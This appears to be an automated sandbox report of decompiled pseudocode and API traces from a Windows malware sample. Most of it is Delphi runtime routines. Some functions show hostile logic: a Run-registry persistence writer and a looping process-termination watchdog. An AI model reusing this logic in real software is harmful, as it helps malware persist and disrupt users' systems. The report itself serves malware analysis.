      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}


































    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20);
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
